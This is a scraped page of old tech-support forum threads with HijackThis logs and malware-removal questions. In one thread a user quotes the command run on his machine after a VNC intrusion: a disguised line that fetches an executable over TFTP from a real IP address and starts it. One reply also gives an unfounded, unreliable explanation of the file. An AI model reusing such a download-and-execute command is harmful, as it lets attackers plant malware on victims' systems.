C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\Microsoft SQL Server\MSSQL$SOSHOME22\Binn\sqlservr.exe
C:\Program Files\Dell\NICCONFIGSVC\NICCONFIGSVC.exe
C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\fxssvc.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\eHome\ehmsas.exe
C:\Program Files\MSN Messenger\usnsvc.exe
C:\Program Files\HJT\HijackThis.exe



R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://us.rd.yahoo.com/customize/ie/defaults/su/msgr8/*http://www.yahoo.com
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = [Link removed again.]
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: SpywareGuardDLBLOCK.CBrowserHelper - {4A368E80-174F-4872-96B5-0B27DDD11DB2} - C:\Program Files\SpywareGuard\dlprotect.dll
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O2 - BHO: CBrowserHelperObject Object - {CA6319C0-31B7-401E-A518-A07C3DB8F777} - c:\Program Files\GoogleAFE\GoogleAE.dll
O3 - Toolbar: (no name) - {0BF43445-2F28-4351-9252-17FE6E806AA0} - (no file)
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O4 - HKLM\..\Run: [Dell QuickSet] C:\Program Files\Dell\QuickSet\quickset.exe
O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SigmatelSysTrayApp] stsystra.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [ISUSScheduler] "C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start
O4 - HKLM\..\Run: [ISUSPM Startup] "C:\Program Files\Common Files\InstallShield\UpdateService\isuspm.exe" -startup
O4 - HKLM\..\Run: [IntelWireless] C:\Program Files\Intel\Wireless\Bin\ifrmewrk.exe /tf Intel PROSet/Wireless
O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [igfxpers] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [igfxhkcmd] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [ehTray] C:\WINDOWS\ehome\ehtray.exe
O4 - HKLM\..\Run: [DXDllRegExe] dxdllreg.exe
O4 - HKLM\..\Run: [ZoneAlarm Client] "C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe"
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE"
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\MSN Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [MySpaceIM] C:\Program Files\MySpace\IM\MySpaceIM.exe
O4 - Startup: SpywareGuard.lnk = C:\Program Files\SpywareGuard\sgmain.exe
O4 - Global Startup: Service Manager.lnk = C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MI1933~1\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\inetrepl.dll
O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\inetrepl.dll
O9 - Extra 'Tools' menuitem: Create Mobile Favorite... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\inetrepl.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra 'Tools' menuitem: xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O11 - Options group: [INTERNATIONAL] International*
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\Common\yinsthelper.dll
O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\MSNMES~1\MSGRAP~1.DLL
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\MSNMES~1\MSGRAP~1.DLL
O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxdev.dll
O20 - Winlogon Notify: IntelWireless - C:\Program Files\Intel\Wireless\Bin\LgNotify.dll
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O21 - SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
O23 - Service: DSBrokerService - Unknown owner - C:\Program Files\DellSupport\brkrsvc.exe
O23 - Service: EvtEng - Intel Corporation - C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Kodak Camera Connection Software (KodakCCS) - Eastman Kodak Company - C:\WINDOWS\system32\drivers\KodakCCS.exe
O23 - Service: NBService - Nero AG - C:\Program Files\Nero\Nero 7\Nero BackItUp\NBService.exe
O23 - Service: NICCONFIGSVC - Dell Inc. - C:\Program Files\Dell\NICCONFIGSVC\NICCONFIGSVC.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: RegSrvc - Intel Corporation - C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
O23 - Service: Spectrum24 Event Monitor (S24EventMonitor) - Intel Corporation  - C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINDOWS\system32\ZoneLabs\vsmon.exe
O23 - Service: WLANKEEPER - Intel® Corporation - C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe

110.

Solve : VNC HACKED!?

Answer»

OK, My home computer was hacked last night, I was working over VNC and I was sitting there taking a drink (of water..lol), and I noticed the task manager popped up, and the commandline popped up and this script started running... So I ripped out my wireless adapter, and tried to figure out what just happened... here is what I GOT.

%comspec% /c ECHO Repairing user32.dll & echo Please wait... & tftp -i 75.5.227.42 GET qsan.exe & start qsan&

Now I have some important stuff on my computer so I need to find a way to figure out what QSAN.EXE DID..

IS THERE A PROGRAM that can record or show all actions of a .exei cant find anything on the .exe FILE do a SYSTEM search and tell us where its located..

what protections do you have?? do you have a firewall??

have you installed any new software?C:\WINDOWS\system32

http://secunia.com/advisories/20107/

Regular XP Firewall and Symantec SAV Corp Ed.11.XXX
WIN DEFENDER

No new software...ummm did you install that program??Some more info that I found, but I just really need to know if anything taken that's why I want to know if there is anything that records what an .exe does.

http://forums.spywareinfo.com/lofiversion/index.php/t95333.html I installed vnc,... what program exactly are you talking about?No I did not install the qsan.exe... it was pull from an tftp server from who ever comprimised my system.have you patched the program?Yes, but right now I'm just trying to figure out what that executable does, or did anything leave my computer.i was talking about the Vnc program
the last reference you gave talked about patching it so try that to stop it from happening again.. if you want look at my signature and dl the programs you dont have and scan in safe mode..what windows do you have?? look in the program folder of the vnc and seee if that .exe is thereOk,.. i'm running windows XP Pro...

Qsan.exe.. is not located in the programs folder .. it's located in c:\WINDOWS\system32

tftp -i 75.5.227.42 GET qsan.exe

That was in the script that was ran...
so it was pulled from somewhere..

QScan means your Beng burner is phoning home to look for the latest driver UPDATES...

If you don't have a Beng burner than post back with more hardware info...

If it's qsan then the same thing is happening but for a RAID or IDE controller card.Try uploading the file to VirusTotal and post the results here.Due to lack of feedback, I am closing this topic.  If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.

111.

Solve : spyware bomb?

Answer»

is there a way to get rid of it permanantly ? the spyware bomb

i keep getting it on spy scan with my system mechanic 6 pro.

maybe was the 1-2-3 spyware free killer i downloaded ?more info, please.
OS, protection, what happend before this, ect?You have Spyware Bomb on your COMPUTER?  Try removing it through Add/Remove Programs.

Posting a HijackThis log might make things a bit easier and would help answer some questions without having to do MUCH work.Due to lack of feedback, I am closing this topic.  If you are the original poster and you would like this topic to be re-opened for any reason, PM me or ANOTHER moderator and it can be arranged.

If you are not the original poster and you require help, please START a New Topic with information about your computer and your problem.

112.

Solve : HiddenExpeanic?

Answer»

Hi
I recently found a FOLDER in My Documents called HiddenExpeanic_AUK-dm.
I was wondering if anyone has heard of it as an Internet search brought no results. It doesn't seem to have caused any harm but I can't delete it as it the message says it is being used by another program. Any HELP would be very gratefully received.
ThanksHm, it could be part of the SDBOT.AUK worm.  If you right-click on the folder and go to Properties, is there anything in it?
What version of Windows is this?
What protection do you have?

You should run a virus scan in Safe Mode, then restart, and post a HijackThis log.I am USING Windows Home SP2 with Norton antivirus.

The properties section just TELLS me that it is an application and that it came from another computer and may well be BLOCKED by my own. No reference in Norton to any blocking of it though.

Alright...well, go ahead and scan with HijackThis (don't make any changes yet!) and post a log for me to take a look at.

Also, in Properties, it doesn't say anything next to Size or Contains?Due to lack of feedback, I am closing this topic.  If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.

113.

Solve : Can't billpay online?

Answer»

Running Windows 2000 with DSL and wireless at home.

Recently I have been fighting a virus and spyware. Got those resolved, during that time I updated to SP4 and uninstalled AOL spyware software and installed CA antivirus software. Ever since I have not been able to pay my bills online. I can get to the financial institutions page to enter the $$ and date, but when I hit "pay bill", nothing happens. If I connect with my wireless laptop, it works FINE. I think the SP4 is the issue, IPsec or something got turned on. Any thoughts where to start?

Thanks in advance.what other protections do you have?? what firewall?? look at my signature for some good free protections and basic instruction

do you have zone alarm firewall by any chance?no firewall that I know of. I am going to upgrade my CA software to include the full Suite of protection they offer. when did this start HAPPENING?? maybe try and disable your Antivirus and try it real quicknot sure because i quit attaching to the internet when my computer was just attaching by itself, my harddrive was going crazy so i unplugged my DSL line until i could get AOL off and CA on and then went to Microsoft website to get the SP4 upgrade.

I thought about that also, i will try it tonight. Hope its that simple, i doubt it. CA is just an ANTI Virus, not a firewall or spyware software at this point

please get superantispyware and the other programs in my signature and update them and scan in safe mode with system restore turned off(If applicable to you) just to make sure you are cleanI would avoid using billpay on this computer for the time being.  Depending on what kind of infections you were hit with, I don't know how trustworthy it is.  First, you definitely need a firewall (such as ZoneAlarm or Kerio).  Without one, you are vunerable.  Also, having NEVER dealt with CA, I don't know how reliable it is, so download AVG Free, AdAware SE Personal, and Spybot - Search & Destroy.  Update all of them and then scan with them (one at a time) in Safe Mode.  At some point, you should also clean up with CCleaner (without Yahoo! toolbar).

Once you're done with all of that, post back with a HijackThis log.  I suspect that something may still be lurking around on your computer.  Don't mind this post; it's just a bit of general maintenance.Sorry, haven't done all the things you guys have recommended. Really busy and with the three day weekend, out of town.

Hope you all had a great weekend.ok what have you done so far if any? Quote from: catskat on May 29, 2007, 11:47:03 AM

Sorry, haven't done all the things you guys have recommended. Really busy and with the three day weekend, out of town.

Hope you all had a great weekend.
Well, when you're ready to work on this with us, come back and let us know so we can start crackin' at it.try using internet explorer that works betterInternet Explorer is better than what?  Anti-virus protection software?  Care to explain?i recommend firefox with IE tab ext.Due to lack of feedback, I am closing this topic.  If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.
114.

Solve : HijackThis Log Help?

Answer»

I was wondering if anyone with some free time could take a look at this log and tell me if there is anything I should remove or fix.

Thank you

Quote

Logfile of HijackThis v1.99.1
Scan saved at 7:32:07 PM, on 3/10/2006
Platform: Windows XP  (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2600.0000)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\Program FILES\CA\eTrust EZ Armor\eTrust EZ Antivirus\ISafe.exe
C:\Program Files\ewido\security suite\ewidoctrl.exe
C:\Program Files\Kerio\Personal Firewall 4\kpf4ss.exe
C:\Program Files\Linksys\WMP11 Config Utility\NICServ.exe
C:\Program Files\Kerio\Personal Firewall 4\kpf4gui.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\VetMsg.exe
C:\Program Files\HP\HP Software Update\HPWuSchd.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\HP\hpcoretech\hpcmpmgr.exe
C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVTray.exe
C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVRID.exe
C:\Program Files\Panicware\Pop-Up Stopper Free Edition\PSFree.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\Google\Google Talk\googletalk.exe
C:\WINDOWS\Alt+Q Hotkey.exe
C:\Program Files\Logitech\MouseWare\system\em_exec.exe
C:\Program Files\UberIcon\UberIcon Manager.exe
C:\Program Files\WinRoll\winroll.exe
C:\Program Files\YzShadow\YzShadow.exe
C:\Program Files\Siber Systems\AI RoboForm\RoboTaskBarIcon.exe
C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe
C:\Program Files\WinZip\WZQKPICK.EXE
C:\WINDOWS\System32\devldr32.exe
C:\WINDOWS\System32\wuauclt.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Kerio\Personal Firewall 4\kpf4gui.exe
C:\Program Files\MSN Messenger\msnmsgr.exe
C:\Program Files\AIM\aim.exe
C:\Program Files\iTunes\iTunes.exe
C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Documents and Settings\armando sr\Local Settings\Temp\wz38f0\HijackThis.exe
Quote
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.com/customize/ycomp_adbe/defaults/sb/*http://www.yahoo.com/search/ie.html
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://g.msn.com/0SEENUS/SAOS01?FORM=TOOLBR
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {3AF9102C-EB4E-47B5-8751-60550E872E39} - (no file)
O2 - BHO: (no name) - {5C8B2A36-3DB1-42A4-A3CB-D426709BBFEB} - (no file)
O2 - BHO: (no name) - {614BBBCC-5C08-30A8-2BB6-0495C885DCBC} - (no file)
O2 - BHO: (no name) - {6449E3C9-575F-61AA-2BB6-0495C885DFEB} - (no file)
O2 - BHO: (no name) - {724d43a9-0d85-11d4-9908-00400523e39a} - C:\Program Files\Siber Systems\AI RoboForm\roboform.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O2 - BHO: (no name) - {FD704130-FFAA-C159-D0E9-A10FA1E64EB7} - (no file)
O2 - BHO: (no name) - {FD704140-FFDF-B258-D0EF-D00FD3954EC2} - (no file)
O3 - Toolbar: (no name) - {40D41A8B-D79B-43d7-99A7-9EE0F344C385} - (no file)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: &RoboForm - {724d43a0-0d85-11d4-9908-00400523e39a} - C:\Program Files\Siber Systems\AI RoboForm\roboform.dll
O4 - HKLM\..\Run: [Logitech Utility] Logi_MwX.Exe
O4 - HKLM\..\Run: [HP Software Update] "C:\Program Files\HP\HP Software Update\HPWuSchd.exe"
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [HP Component Manager] "C:\Program Files\HP\hpcoretech\hpcmpmgr.exe"
O4 - HKLM\..\Run: [CaAvTray] "C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVTray.exe"
O4 - HKLM\..\Run: [CAVRID] "C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVRID.exe"
O4 - HKLM\..\Run: [System Files Updater] C:\WINDOWS\FlyakiteOSX\Tools\System Files Updater.exe /S
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
O4 - HKCU\..\Run: [Microsoft Works Update Detection] \WkDetect.exe
O4 - HKCU\..\Run: [PopUpStopperFreeEdition] "C:\Program Files\Panicware\Pop-Up Stopper Free Edition\PSFree.exe"
O4 - HKCU\..\Run: [LDM] \Program\
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [googletalk] "C:\Program Files\Google\Google Talk\googletalk.exe" /autostart
O4 - HKCU\..\Run: [RK Launcher] C:\Program Files\RK Launcher\RKLauncher.exe
O4 - HKCU\..\Run: [Alt+Q Hotkey Tool] C:\WINDOWS\Alt+Q Hotkey.exe
O4 - HKCU\..\Run: [UberIcon] "C:\Program Files\UberIcon\UberIcon Manager.exe"
O4 - HKCU\..\Run: [WinRoll] C:\Program Files\WinRoll\winroll.exe
O4 - HKCU\..\Run: [Yz Shadow] C:\Program Files\YzShadow\YzShadow.exe
O4 - HKCU\..\Run: [ObjectDock] C:\Program Files\ObjectDock\ObjectDock.exe
O4 - HKCU\..\Run: [RoboForm] "C:\Program Files\Siber Systems\AI RoboForm\RoboTaskBarIcon.exe"
O4 - Startup: LimeWire On Startup.lnk = C:\Program Files\LimeWire\LimeWire.exe
O4 - Global Startup: Microsoft Works Calendar Reminders.lnk = ?
O4 - Global Startup: Wireless-B PCI Adapter Utility.lnk = C:\Program Files\Linksys\WMP11 Config Utility\WMP11Cfg.exe
O4 - Global Startup: Logitech Desktop Messenger.lnk = C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LDMConf.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: WinZip Quick Pick.lnk = C:\Program Files\WinZip\WZQKPICK.EXE
O8 - Extra context menu item: &AIM Search - res://C:\Program Files\AIM Toolbar\AIMBar.dll/aimsearch.htm
O8 - Extra context menu item: &MSN Search - res://C:\Program Files\MSN Toolbar Suite\TB\02.00.0001.1203\en-us\msntb.dll/search.htm
O8 - Extra context menu item: Customize Menu - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComCustomizeIEMenu.html
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Fill Forms - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComFillForms.html
O8 - Extra context menu item: RoboForm Toolbar - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComShowToolbar.html
O8 - Extra context menu item: Save Forms - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComSavePass.html
This isn't a full logfile. Because of forum restrictioons, you need to split your posts up into sections of less than 5500 characters and post them sequentially. Quote
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra button: Fill Forms - {320AF880-6646-11D3-ABEE-C5DBF3571F46} - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComFillForms.html
O9 - Extra 'Tools' menuitem: Fill Forms - {320AF880-6646-11D3-ABEE-C5DBF3571F46} - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComFillForms.html
O9 - Extra button: Save - {320AF880-6646-11D3-ABEE-C5DBF3571F49} - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComSavePass.html
O9 - Extra 'Tools' menuitem: Save Forms - {320AF880-6646-11D3-ABEE-C5DBF3571F49} - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComSavePass.html
O9 - Extra button: RoboForm - {724d43aa-0d85-11d4-9908-00400523e39a} - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComShowToolbar.html
O9 - Extra 'Tools' menuitem: RoboForm Toolbar - {724d43aa-0d85-11d4-9908-00400523e39a} - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComShowToolbar.html
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~1\OFFICE11\REFIEBAR.DLL
O9 - Extra button: AIM - {AC9E2541-2814-11d5-BC6D-00B0D0A1DE45} - C:\Program Files\AIM\aim.exe
O9 - Extra button: PartyPoker.net - {F4430FE8-2638-42e5-B849-800749B94EED} - C:\Program Files\PartyPoker.net\partypokernet.exe (file missing)
O9 - Extra 'Tools' menuitem: PartyPoker.net - {F4430FE8-2638-42e5-B849-800749B94EED} - C:\Program Files\PartyPoker.net\partypokernet.exe (file missing)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O9 - Extra 'Tools' menuitem: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O9 - Extra button: WEATHERBUG - {AF6CABAB-61F9-4f12-A198-B7D41EF1CB52} - C:\Program Files\AWS\WeatherBug\Weather.exe (file missing) (HKCU)
O16 - DPF: {8E0D4DE5-3180-4024-A327-4DFAD1796A8D} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsClient.cab31267.cab
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoftware.com/activescan/as5/asinst.cab
O16 - DPF: {9B03C5F1-F5AB-47EE-937D-A8EDA626F876} (Anonymizer Anti-Spyware Scanner) - http://download.zonelabs.com/bin/promotions/spywaredetector/WebAAS.cab
O18 - Protocol: bw+0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw+0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw-0 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw-0s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw00 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw00s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw10 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw10s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw20 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw20s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw30 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw30s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw40 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw40s - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
O18 - Protocol: bw50 - {674581ED-5129-4294-925D-E003B02B69B6} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
